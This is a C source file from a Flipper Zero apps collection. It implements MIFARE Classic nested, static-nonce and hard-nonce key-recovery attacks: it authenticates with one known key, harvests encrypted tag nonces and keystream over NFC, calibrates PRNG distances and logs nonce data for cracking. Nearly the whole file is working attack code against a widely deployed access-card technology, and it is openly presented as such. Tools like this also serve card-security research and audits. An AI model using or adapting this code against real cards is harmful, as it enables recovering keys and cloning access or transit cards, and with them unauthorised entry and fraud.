Momentum-Apps/lib/nested/nested.c

#include "nested.h"

#include <furi_hal_nfc.h>
#include "../../lib/parity/parity.h"
#include "../../lib/crypto1/crypto1.h"
#define TAG "Nested"

void nfc_util_num2bytes(uint64_t src, uint8_t len, uint8_t* dest) {
    furi_assert(dest);
    furi_assert(len <= 8);

    while(len--) {
        dest[len] = (uint8_t)src;
        src >>= 8;
    }
}

uint64_t nfc_util_bytes2num(const uint8_t* src, uint8_t len) {
    furi_assert(src);
    furi_assert(len <= 8);

    uint64_t res = 0;
    while(len--) {
        res = (res << 8) | (*src);
        src++;
    }
    return res;
}

uint16_t nfca_get_crc16(uint8_t* buff, uint16_t len) {
    uint16_t crc = 0x6363; // NFCA_CRC_INIT
    uint8_t byte = 0;

    for(uint8_t i = 0; i < len; i++) {
        byte = buff[i];
        byte ^= (uint8_t)(crc & 0xff);
        byte ^= byte << 4;
        crc = (crc >> 8) ^ (((uint16_t)byte) << 8) ^ (((uint16_t)byte) << 3) ^
              (((uint16_t)byte) >> 4);
    }

    return crc;
}

void nfca_append_crc16(uint8_t* buff, uint16_t len) {
    uint16_t crc = nfca_get_crc16(buff, len);
    buff[len] = (uint8_t)crc;
    buff[len + 1] = (uint8_t)(crc >> 8);
}

bool mifare_sendcmd_short(
    Crypto1* crypto,
    FuriHalNfcTxRxContext* tx_rx,
    bool crypted,
    uint32_t cmd,
    uint32_t data) {
    uint16_t pos;
    uint8_t dcmd[4] = {cmd, data, 0x00, 0x00};
    nfca_append_crc16(dcmd, 2);

    memset(tx_rx->tx_data, 0, sizeof(tx_rx->tx_data));
    memset(tx_rx->tx_parity, 0, sizeof(tx_rx->tx_parity));

    if(crypted) {
        for(pos = 0; pos < 4; pos++) {
            uint8_t res = crypto1_byte(crypto, 0x00, 0) ^ dcmd[pos];
            tx_rx->tx_data[pos] = res;
            tx_rx->tx_parity[0] |=
                (((crypto1_filter(crypto->odd) ^ oddparity8(dcmd[pos])) & 0x01) << (7 - pos));
        }

        tx_rx->tx_rx_type = FuriHalNfcTxRxTypeRaw;
        tx_rx->tx_bits = 4 * 8;
    } else {
        for(pos = 0; pos < 2; pos++) {
            tx_rx->tx_data[pos] = dcmd[pos];
        }

        tx_rx->tx_rx_type = FuriHalNfcTxRxTypeRxNoCrc;
        tx_rx->tx_bits = 2 * 8;
    }

    if(!furi_hal_nfc_tx_rx(tx_rx, 6)) return false;

    return true;
}

bool mifare_classic_authex(
    Crypto1* crypto,
    FuriHalNfcTxRxContext* tx_rx,
    uint32_t uid,
    uint32_t blockNo,
    uint32_t keyType,
    uint64_t ui64Key,
    bool isNested,
    uint32_t* ntptr) {
    uint32_t nt, ntpp; // Supplied tag nonce
    uint8_t nr[4];

    // "random" reader nonce:
    nfc_util_num2bytes(prng_successor(0, 32), 4, nr); // DWT->CYCCNT

    // Transmit MIFARE_CLASSIC_AUTH
    if(!mifare_sendcmd_short(crypto, tx_rx, isNested, 0x60 + (keyType & 0x01), blockNo)) {
        return false;
    };

    memset(tx_rx->tx_data, 0, sizeof(tx_rx->tx_data));
    memset(tx_rx->tx_parity, 0, sizeof(tx_rx->tx_parity));

    nt = (uint32_t)nfc_util_bytes2num(tx_rx->rx_data, 4);

    if(isNested) crypto1_reset(crypto); // deinit

    crypto1_init(crypto, ui64Key);

    if(isNested) {
        nt = crypto1_word(crypto, nt ^ uid, 1) ^ nt;
    } else {
        crypto1_word(crypto, nt ^ uid, 0);
    }

    // save Nt
    if(ntptr) *ntptr = nt;

    // Generate (encrypted) nr+parity by loading it into the cipher (Nr)
    tx_rx->tx_parity[0] = 0;
    for(uint8_t i = 0; i < 4; i++) {
        tx_rx->tx_data[i] = crypto1_byte(crypto, nr[i], 0) ^ nr[i];
        tx_rx->tx_parity[0] |=
            (((crypto1_filter(crypto->odd) ^ oddparity8(nr[i])) & 0x01) << (7 - i));
    }

    nt = prng_successor(nt, 32);

    for(uint8_t i = 4; i < 8; i++) {
        nt = prng_successor(nt, 8);
        tx_rx->tx_data[i] = crypto1_byte(crypto, 0x00, 0) ^ (nt & 0xff);
        tx_rx->tx_parity[0] |=
            (((crypto1_filter(crypto->odd) ^ oddparity8(nt & 0xff)) & 0x01) << (7 - i));
    }

    tx_rx->tx_rx_type = FuriHalNfcTxRxTypeRaw;
    tx_rx->tx_bits = 8 * 8;

    if(!furi_hal_nfc_tx_rx(tx_rx, 25)) {
        return false;
    };

    uint32_t answer = (uint32_t)nfc_util_bytes2num(tx_rx->rx_data, 4);

    ntpp = prng_successor(nt, 32) ^ crypto1_word(crypto, 0, 0);

    if(answer != ntpp) {
        return false;
    }

    return true;
}

static int valid_nonce(uint32_t Nt, uint32_t NtEnc, uint32_t Ks1, const uint8_t* parity) {
    return ((oddparity8((Nt >> 24) & 0xFF) ==
             ((parity[0]) ^ oddparity8((NtEnc >> 24) & 0xFF) ^ FURI_BIT(Ks1, 16))) &&
            (oddparity8((Nt >> 16) & 0xFF) ==
             ((parity[1]) ^ oddparity8((NtEnc >> 16) & 0xFF) ^ FURI_BIT(Ks1, 8))) &&
            (oddparity8((Nt >> 8) & 0xFF) ==
             ((parity[2]) ^ oddparity8((NtEnc >> 8) & 0xFF) ^ FURI_BIT(Ks1, 0)))) ?
               1 :
               0;
}

void nonce_distance(uint32_t* msb, uint32_t* lsb) {
    uint16_t x = 1, pos;
    uint8_t calc_ok = 0;

    for(uint16_t i = 1; i; ++i) {
        pos = (x & 0xff) << 8 | x >> 8;

        if((pos == *msb) & !(calc_ok >> 0 & 0x01)) {
            *msb = i;
            calc_ok |= 0x01;
        }

        if((pos == *lsb) & !(calc_ok >> 1 & 0x01)) {
            *lsb = i;
            calc_ok |= 0x02;
        }

        if(calc_ok == 0x03) {
            return;
        }

        x = x >> 1 | (x ^ x >> 2 ^ x >> 3 ^ x >> 5) << 15;
    }
}

bool validate_prng_nonce(uint32_t nonce) {
    uint32_t msb = nonce >> 16;
    uint32_t lsb = nonce & 0xffff;
    nonce_distance(&msb, &lsb);
    return ((65535 - msb + lsb) % 65535) == 16;
}

MifareNestedNonceType nested_check_nonce_type(FuriHalNfcTxRxContext* tx_rx, uint8_t blockNo) {
    uint32_t nonces[5] = {};
    uint8_t sameNonces = 0;
    uint8_t hardNonces = 0;
    Crypto1 crypt;
    Crypto1* crypto = {&crypt};

    for(int32_t i = 0; i < 5; i++) {
        // Setup nfc poller
        nfc_activate();
        furi_hal_nfc_activate_nfca(100, NULL);

        // Start communication
        bool success = mifare_sendcmd_short(crypto, tx_rx, false, 0x60, blockNo);
        if(!success) {
            continue;
        };

        uint32_t nt = (uint32_t)nfc_util_bytes2num(tx_rx->rx_data, 4);
        if(nt == 0) continue;
        if(!validate_prng_nonce(nt)) hardNonces++;
        nonces[i] = nt;

        nfc_deactivate();
    }

    for(int32_t i = 0; i < 5; i++) {
        for(int32_t j = 0; j < 5; j++) {
            if(i != j && nonces[j] && nonces[i] == nonces[j]) {
                sameNonces++;
            }
        }
    }

    if(!nonces[4]) {
        return MifareNestedNonceNoTag;
    }

    if(sameNonces > 3) {
        return MifareNestedNonceStatic;
    }

    if(hardNonces > 3) {
        return MifareNestedNonceHard;
    }

    return MifareNestedNonceWeak;
}

struct nonce_info_static nested_static_nonce_attack(
    FuriHalNfcTxRxContext* tx_rx,
    uint8_t blockNo,
    uint8_t keyType,
    uint8_t targetBlockNo,
    uint8_t targetKeyType,
    uint64_t ui64Key) {
    uint32_t cuid = 0;
    Crypto1* crypto = malloc(sizeof(Crypto1));
    struct nonce_info_static r;

    r.full = false;

    // Setup nfc poller
    nfc_activate();
    if(!furi_hal_nfc_activate_nfca(200, &cuid)) {
        free(crypto);
        return r;
    }

    r.cuid = cuid;

    uint32_t nt1;
    uint32_t nt_unused;

    crypto1_reset(crypto);

    mifare_classic_authex(crypto, tx_rx, cuid, blockNo, keyType, ui64Key, false, &nt1);

    if(targetKeyType == 1 && nt1 == 0x009080A2) {
        r.target_nt[0] = prng_successor(nt1, 161);
        r.target_nt[1] = prng_successor(nt1, 321);
    } else {
        r.target_nt[0] = prng_successor(nt1, 160);
        r.target_nt[1] = prng_successor(nt1, 320);
    }

    bool success =
        mifare_sendcmd_short(crypto, tx_rx, true, 0x60 + (targetKeyType & 0x01), targetBlockNo);

    if(!success) {
        free(crypto);
        return r;
    };

    uint32_t nt2 = nfc_util_bytes2num(tx_rx->rx_data, 4);
    r.target_ks[0] = nt2 ^ r.target_nt[0];

    nfc_activate();

    if(!furi_hal_nfc_activate_nfca(200, &cuid)) {
        free(crypto);
        return r;
    }

    crypto1_reset(crypto);

    mifare_classic_authex(crypto, tx_rx, cuid, blockNo, keyType, ui64Key, false, &nt1);

    mifare_classic_authex(crypto, tx_rx, cuid, blockNo, keyType, ui64Key, true, &nt_unused);

    success =
        mifare_sendcmd_short(crypto, tx_rx, true, 0x60 + (targetKeyType & 0x01), targetBlockNo);

    free(crypto);

    if(!success) {
        return r;
    };

    uint32_t nt3 = (uint32_t)nfc_util_bytes2num(tx_rx->rx_data, 4);

    r.target_ks[1] = nt3 ^ r.target_nt[1];
    r.full = true;

    nfc_deactivate();

    return r;
}

uint32_t nested_calibrate_distance(
    FuriHalNfcTxRxContext* tx_rx,
    uint8_t blockNo,
    uint8_t keyType,
    uint64_t ui64Key,
    uint32_t delay,
    bool full) {
    uint32_t cuid = 0;
    Crypto1* crypto = malloc(sizeof(Crypto1));
    uint32_t nt1, nt2, i = 0, davg = 0, dmin = 0, dmax = 0, rtr = 0, unsuccessful_tries = 0;
    uint32_t max_prng_value = full ? 65565 : 1200;
    uint32_t rounds = full ? 5 : 17; // full does not require precision
    uint32_t collected = 0;

    for(rtr = 0; rtr < rounds; rtr++) {
        nfc_activate();
        if(!furi_hal_nfc_activate_nfca(200, &cuid)) break;

        if(!mifare_classic_authex(crypto, tx_rx, cuid, blockNo, keyType, ui64Key, false, &nt1)) {
            continue;
        }

        furi_delay_us(delay);

        if(!mifare_classic_authex(crypto, tx_rx, cuid, blockNo, keyType, ui64Key, true, &nt2)) {
            continue;
        }

        // NXP Mifare is typical around 840, but for some unlicensed/compatible mifare tag this can be 160
        uint32_t nttmp = prng_successor(nt1, 100);

        for(i = 101; i < max_prng_value; i++) {
            nttmp = prng_successor(nttmp, 1);
            if(nttmp == nt2) break;
        }

        if(i != max_prng_value) {
            if(rtr != 0) {
                davg += i;
                dmin = MIN(dmin, i);
                dmax = MAX(dmax, i);
            } else {
                dmin = dmax = i;
            }

            FURI_LOG_D(TAG, "Calibrating: ntdist=%lu", i);
            collected++;
        } else {
            unsuccessful_tries++;
            if(unsuccessful_tries > 12) {
                free(crypto);
                FURI_LOG_E(
                    TAG,
                    "Tag isn't vulnerable to nested attack (random numbers are not predictable)");
                return 0;
            }
        }
    }

    if(collected > 1) davg = (davg + (collected - 1) / 2) / (collected - 1);

    davg = MIN(MAX(dmin, davg), dmax);

    FURI_LOG_I(
        TAG,
        "Calibration completed: rtr=%lu min=%lu max=%lu avg=%lu collected=%lu",
        rtr,
        dmin,
        dmax,
        davg,
        collected);

    free(crypto);

    nfc_deactivate();

    return davg;
}

struct distance_info nested_calibrate_distance_info(
    FuriHalNfcTxRxContext* tx_rx,
    uint8_t blockNo,
    uint8_t keyType,
    uint64_t ui64Key) {
    uint32_t cuid = 0;
    Crypto1* crypto = malloc(sizeof(Crypto1));
    uint32_t nt1, nt2, i = 0, davg = 0, dmin = 0, dmax = 0, rtr = 0, unsuccessful_tries = 0;
    struct distance_info r;
    r.min_prng = 0;
    r.max_prng = 0;
    r.mid_prng = 0;

    for(rtr = 0; rtr < 10; rtr++) {
        nfc_activate();
        if(!furi_hal_nfc_activate_nfca(200, &cuid)) break;

        mifare_classic_authex(crypto, tx_rx, cuid, blockNo, keyType, ui64Key, false, &nt1);

        mifare_classic_authex(crypto, tx_rx, cuid, blockNo, keyType, ui64Key, true, &nt2);

        // NXP Mifare is typical around 840, but for some unlicensed/compatible mifare tag this can be 160
        uint32_t nttmp = prng_successor(nt1, 1);

        for(i = 2; i < 65565; i++) {
            nttmp = prng_successor(nttmp, 1);
            if(nttmp == nt2) break;
        }

        if(i != 65565) {
            if(rtr != 0) {
                davg += i;
                if(dmin == 0) {
                    dmin = i;
                } else {
                    dmin = MIN(dmin, i);
                }
                dmax = MAX(dmax, i);
            }

            FURI_LOG_D(TAG, "Calibrating: ntdist=%lu", i);
        } else {
            unsuccessful_tries++;
            if(unsuccessful_tries > 12) {
                free(crypto);

                FURI_LOG_E(
                    TAG,
                    "Tag isn't vulnerable to nested attack (random numbers are not predictable)");

                return r;
            }
        }
    }

    if(rtr > 1) davg = (davg + (rtr - 1) / 2) / (rtr - 1);

    FURI_LOG_I(
        TAG, "Calibration completed: rtr=%lu min=%lu max=%lu avg=%lu", rtr, dmin, dmax, davg);

    r.min_prng = dmin;
    r.max_prng = dmax;
    r.mid_prng = davg;

    free(crypto);

    nfc_deactivate();

    return r;
}

struct nonce_info nested_attack(
    FuriHalNfcTxRxContext* tx_rx,
    uint8_t blockNo,
    uint8_t keyType,
    uint8_t targetBlockNo,
    uint8_t targetKeyType,
    uint64_t ui64Key,
    uint32_t distance,
    uint32_t delay) {
    uint32_t cuid = 0;
    Crypto1* crypto = malloc(sizeof(Crypto1));
    uint8_t par_array[4] = {0x00};
    uint32_t nt1, nt2, ks1, i = 0, j = 0;
    struct nonce_info r;
    uint32_t dmin = distance - 2;
    uint32_t dmax = distance + 2;

    r.full = false;

    for(i = 0; i < 2; i++) { // look for exactly two different nonces
        r.target_nt[i] = 0;

        while(r.target_nt[i] == 0) { // continue until we have an unambiguous nonce
            nfc_activate();
            if(!furi_hal_nfc_activate_nfca(200, &cuid)) {
                free(crypto);
                return r;
            }

            r.cuid = cuid;

            mifare_classic_authex(crypto, tx_rx, cuid, blockNo, keyType, ui64Key, false, &nt1);

            furi_delay_us(delay);

            bool success = mifare_sendcmd_short(
                crypto, tx_rx, true, 0x60 + (targetKeyType & 0x01), targetBlockNo);

            if(!success) continue;

            nt2 = nfc_util_bytes2num(tx_rx->rx_data, 4);

            // Parity validity check
            for(j = 0; j < 4; j++) {
                par_array[j] =
                    (oddparity8(tx_rx->rx_data[j]) != ((tx_rx->rx_parity[0] >> (7 - j)) & 0x01));
            }

            uint32_t ncount = 0;
            uint32_t nttest = prng_successor(nt1, dmin - 1);

            for(j = dmin; j < dmax + 1; j++) {
                nttest = prng_successor(nttest, 1);
                ks1 = nt2 ^ nttest;

                if(valid_nonce(nttest, nt2, ks1, par_array)) {
                    if(ncount > 0) { // we are only interested in disambiguous nonces, try again
                        FURI_LOG_D(TAG, "Nonce#%lu: dismissed (ambiguous), ntdist=%lu", i + 1, j);
                        r.target_nt[i] = 0;
                        break;
                    }

                    if(delay) {
                        // will predict later
                        r.target_nt[i] = nt1;
                        r.target_ks[i] = nt2;
                    } else {
                        r.target_nt[i] = nttest;
                        r.target_ks[i] = ks1;
                    }

                    memcpy(&r.parity[i], par_array, 4);
                    ncount++;

                    if(i == 1 &&
                       (r.target_nt[0] == r.target_nt[1] ||
                        r.target_ks[0] == r.target_ks[1])) { // we need two different nonces
                        r.target_nt[i] = 0;
                        FURI_LOG_D(TAG, "Nonce#2: dismissed (= nonce#1), ntdist=%lu", j);
                        break;
                    }

                    FURI_LOG_D(TAG, "Nonce#%lu: valid, ntdist=%lu", i + 1, j);
                }
            }

            if(r.target_nt[i] == 0 && j == dmax + 1) {
                FURI_LOG_D(TAG, "Nonce#%lu: dismissed (all invalid)", i + 1);
            }
        }
    }

    if(r.target_nt[0] && r.target_nt[1]) {
        r.full = true;
    }

    free(crypto);

    nfc_deactivate();

    return r;
}

struct nonce_info_hard nested_hard_nonce_attack(
    FuriHalNfcTxRxContext* tx_rx,
    uint8_t blockNo,
    uint8_t keyType,
    uint8_t targetBlockNo,
    uint8_t targetKeyType,
    uint64_t ui64Key,
    uint32_t* found,
    uint32_t* first_byte_sum,
    Stream* file_stream) {
    uint32_t cuid = 0;
    uint8_t same = 0;
    uint64_t previous = 0;
    Crypto1* crypto = malloc(sizeof(Crypto1));
    uint8_t par_array[4] = {0x00};
    struct nonce_info_hard r;
    r.full = false;
    r.static_encrypted = false;

    for(uint32_t i = 0; i < 8; i++) {
        nfc_activate();
        if(!furi_hal_nfc_activate_nfca(200, &cuid)) {
            free(crypto);
            return r;
        }

        r.cuid = cuid;

        if(!mifare_classic_authex(crypto, tx_rx, cuid, blockNo, keyType, ui64Key, false, NULL))
            continue;

        if(!mifare_sendcmd_short(crypto, tx_rx, true, 0x60 + (targetKeyType & 0x01), targetBlockNo))
            continue;

        uint64_t nt = nfc_util_bytes2num(tx_rx->rx_data, 4);

        for(uint32_t j = 0; j < 4; j++) {
            par_array[j] =
                (oddparity8(tx_rx->rx_data[j]) != ((tx_rx->rx_parity[0] >> (7 - j)) & 0x01));
        }

        uint8_t pbits = 0;
        for(uint8_t j = 0; j < 4; j++) {
            uint8_t p = oddparity8(tx_rx->rx_data[j]);
            if(par_array[j]) {
                p ^= 1;
            }
            pbits <<= 1;
            pbits |= p;
        }

        // update unique nonces
        if(!found[tx_rx->rx_data[0]]) {
            *first_byte_sum += evenparity32(pbits & 0x08);
            found[tx_rx->rx_data[0]]++;
        }

        if(nt == previous) {
            same++;
        }

        previous = nt;

        FuriString* row = furi_string_alloc_printf("%llu|%u\n", nt, pbits);
        stream_write_string(file_stream, row);

        FURI_LOG_D(TAG, "Accured %lu/8 nonces", i + 1);
        furi_string_free(row);
    }

    if(same > 4) {
        r.static_encrypted = true;
    }

    r.full = true;

    free(crypto);

    nfc_deactivate();

    return r;
}

NestedCheckKeyResult nested_check_key(
    FuriHalNfcTxRxContext* tx_rx,
    uint8_t blockNo,
    uint8_t keyType,
    uint64_t ui64Key) {
    uint32_t cuid = 0;
    uint32_t nt;

    nfc_activate();
    if(!furi_hal_nfc_activate_nfca(200, &cuid)) return NestedCheckKeyNoTag;

    FURI_LOG_D(
        TAG, "Checking %c key %012llX for block %u", !keyType ? 'A' : 'B', ui64Key, blockNo);

    Crypto1* crypto = malloc(sizeof(Crypto1));

    bool success =
        mifare_classic_authex(crypto, tx_rx, cuid, blockNo, keyType, ui64Key, false, &nt);

    free(crypto);

    nfc_deactivate();

    return success ? NestedCheckKeyValid : NestedCheckKeyInvalid;
}

bool nested_check_block(FuriHalNfcTxRxContext* tx_rx, uint8_t blockNo, uint8_t keyType) {
    uint32_t cuid = 0;

    nfc_activate();
    if(!furi_hal_nfc_activate_nfca(200, &cuid)) return false;

    Crypto1* crypto = malloc(sizeof(Crypto1));

    bool success = mifare_sendcmd_short(crypto, tx_rx, false, 0x60 + (keyType & 0x01), blockNo);

    free(crypto);

    nfc_deactivate();

    return success;
}

void nested_get_data(FuriHalNfcDevData* dev_data) {
    nfc_activate();
    furi_hal_nfc_detect(dev_data, 400);
    nfc_deactivate();
}

void nfc_activate() {
    nfc_deactivate();

    // Setup nfc poller
    furi_hal_nfc_exit_sleep();
    furi_hal_nfc_ll_txrx_on();
    furi_hal_nfc_ll_poll();
    if(furi_hal_nfc_ll_set_mode(
           FuriHalNfcModePollNfca, FuriHalNfcBitrate106, FuriHalNfcBitrate106) !=
       FuriHalNfcReturnOk)
        return;

    furi_hal_nfc_ll_set_fdt_listen(FURI_HAL_NFC_LL_FDT_LISTEN_NFCA_POLLER);
    furi_hal_nfc_ll_set_fdt_poll(FURI_HAL_NFC_LL_FDT_POLL_NFCA_POLLER);
    furi_hal_nfc_ll_set_error_handling(FuriHalNfcErrorHandlingNfc);
    furi_hal_nfc_ll_set_guard_time(FURI_HAL_NFC_LL_GT_NFCA);
}

void nfc_deactivate() {
    furi_hal_nfc_ll_txrx_off();
    furi_hal_nfc_start_sleep();
    furi_hal_nfc_sleep();
}